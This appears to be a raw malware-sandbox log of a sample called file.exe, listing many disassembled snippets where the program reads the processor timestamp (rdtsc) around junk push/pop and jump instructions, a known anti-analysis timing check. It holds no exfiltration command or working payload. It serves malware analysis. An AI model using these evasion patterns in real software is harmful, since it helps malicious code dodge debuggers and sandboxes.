Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5D4E8 second address: C5D506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], esi 0x00000009 jns 00007FA22C835FA6h 0x0000000f and cl, 0000007Bh 0x00000012 push eax 0x00000013 pushad 0x00000014 pushad 0x00000015 push esi 0x00000016 pop esi 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5D506 second address: C5D50A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA38FE second address: CA3942 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA22C835FACh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FA22C835FB6h 0x00000011 jmp 00007FA22C835FB0h 0x00000016 popad 0x00000017 push ecx 0x00000018 push ebx 0x00000019 push eax 0x0000001a pop eax 0x0000001b pop ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FA22C835FB4h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA3ABF second address: CA3ACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FA22C516E36h 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA3ACA second address: CA3AD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA3AD0 second address: CA3AD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA3AD6 second address: CA3ADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA3EA7 second address: CA3EC6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 js 00007FA22C516E36h 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA22C516E3Bh 0x00000013 jne 00007FA22C516E36h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA9181 second address: CA918C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA918C second address: CA9192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA92DF second address: CA92E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA92E3 second address: CA92E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA95E6 second address: CA95ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA8CA7 second address: CA8D18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E46h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FA22C516E50h 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FA22C516E48h 0x00000016 je 00007FA22C516E3Ah 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FA22C516E47h 0x00000023 jmp 00007FA22C516E44h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA99CA second address: CA99CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA99CE second address: CA99D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA99D2 second address: CA99D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA99D8 second address: CA99E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA99E4 second address: CA99EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA99EC second address: CA99FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FA22C516E36h 0x0000000a jc 00007FA22C516E36h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA99FC second address: CA9A21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C835FB5h 0x00000007 jnc 00007FA22C835FA6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA9A21 second address: CA9A25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA9B7F second address: CA9B85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA9B85 second address: CA9B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAC1C7 second address: CAC1D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FA22C835FA6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAC1D3 second address: CAC1D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAF85A second address: CAF86C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA22C835FA6h 0x0000000a je 00007FA22C835FA6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAF86C second address: CAF892 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FA22C516E49h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAF892 second address: CAF898 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAF898 second address: CAF89C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAF373 second address: CAF377 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAF377 second address: CAF391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA22C516E44h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB1E51 second address: CB1E55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB1E55 second address: CB1E71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA22C516E42h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB689B second address: CB68A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB68A1 second address: CB68CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FA22C516E38h 0x0000000c jmp 00007FA22C516E46h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB6A26 second address: CB6A2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB6A2C second address: CB6A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007FA22C516E3Ch 0x0000000b popad 0x0000000c jl 00007FA22C516E5Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB6A48 second address: CB6A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB6A4E second address: CB6A52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB6BCC second address: CB6BD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA22C835FA6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB6D47 second address: CB6D53 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB6D53 second address: CB6D62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB6D62 second address: CB6D68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB6D68 second address: CB6D71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB6D71 second address: CB6D75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB6D75 second address: CB6D79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5D9BB second address: C5D9C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB7BDD second address: CB7BE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB7BE1 second address: CB7BE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB7BE5 second address: CB7C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FA22C835FB8h 0x0000000d pushad 0x0000000e jmp 00007FA22C835FB7h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBC08B second address: CBC0A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007FA22C516E43h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBBB0E second address: CBBB14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC0039 second address: CC003D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC003D second address: CC0043 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBF964 second address: CBF969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBF969 second address: CBF96F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBF96F second address: CBF975 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBFD6E second address: CBFDA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push esi 0x00000007 push eax 0x00000008 jmp 00007FA22C835FB7h 0x0000000d jmp 00007FA22C835FADh 0x00000012 pop eax 0x00000013 push edi 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC7391 second address: CC73B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA22C516E46h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC73B3 second address: CC73C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA22C835FACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC7664 second address: CC766F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC79AB second address: CC79AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC79AF second address: CC79B7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC7ED0 second address: CC7EE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA22C835FACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC7EE1 second address: CC7EEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FA22C516E36h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC7EEF second address: CC7F0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA22C835FA6h 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esi 0x0000000e jmp 00007FA22C835FABh 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC8500 second address: CC8538 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA22C516E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jmp 00007FA22C516E40h 0x00000010 pop ebx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FA22C516E49h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC8538 second address: CC8540 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC8540 second address: CC8544 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC87E7 second address: CC87F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jbe 00007FA22C835FA8h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC8ADE second address: CC8B0D instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA22C516E43h 0x00000008 jmp 00007FA22C516E3Bh 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jno 00007FA22C516E42h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push ebx 0x0000001a push esi 0x0000001b pop esi 0x0000001c pop ebx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC8B0D second address: CC8B17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FA22C835FA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC8DC9 second address: CC8E15 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA22C516E36h 0x00000008 jns 00007FA22C516E36h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FA22C516E42h 0x00000015 jp 00007FA22C516E3Ch 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f jmp 00007FA22C516E40h 0x00000024 jns 00007FA22C516E36h 0x0000002a popad 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC8E15 second address: CC8E1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC8E1D second address: CC8E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC8E22 second address: CC8E2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FA22C835FA6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCAA47 second address: CCAA6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E3Ch 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnp 00007FA22C516E3Eh 0x00000011 push esi 0x00000012 pop esi 0x00000013 jp 00007FA22C516E36h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCAA6B second address: CCAA87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA22C835FB8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCC1DD second address: CCC1EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007FA22C516E36h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD6E01 second address: CD6E0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD6E0A second address: CD6E0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD6F78 second address: CD6F81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD6F81 second address: CD6F87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD6F87 second address: CD6F8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD6F8B second address: CD6F91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE06E1 second address: CE06E6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE06E6 second address: CE06EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE06EE second address: CE06F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDE986 second address: CDE9BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E45h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA22C516E49h 0x0000000e jng 00007FA22C516E36h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDE9BE second address: CDE9CF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007FA22C835FB8h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDEE1E second address: CDEE2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007FA22C516E36h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDEFB8 second address: CDEFC4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jnc 00007FA22C835FA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDEFC4 second address: CDEFCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FA22C516E36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDEFCE second address: CDEFD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDF293 second address: CDF2A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA22C516E3Fh 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDF2A7 second address: CDF2AC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDF2AC second address: CDF2B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDF2B4 second address: CDF2BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDF40E second address: CDF416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDF416 second address: CDF421 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA22C835FA6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDF7D3 second address: CDF7E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jo 00007FA22C516E3Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
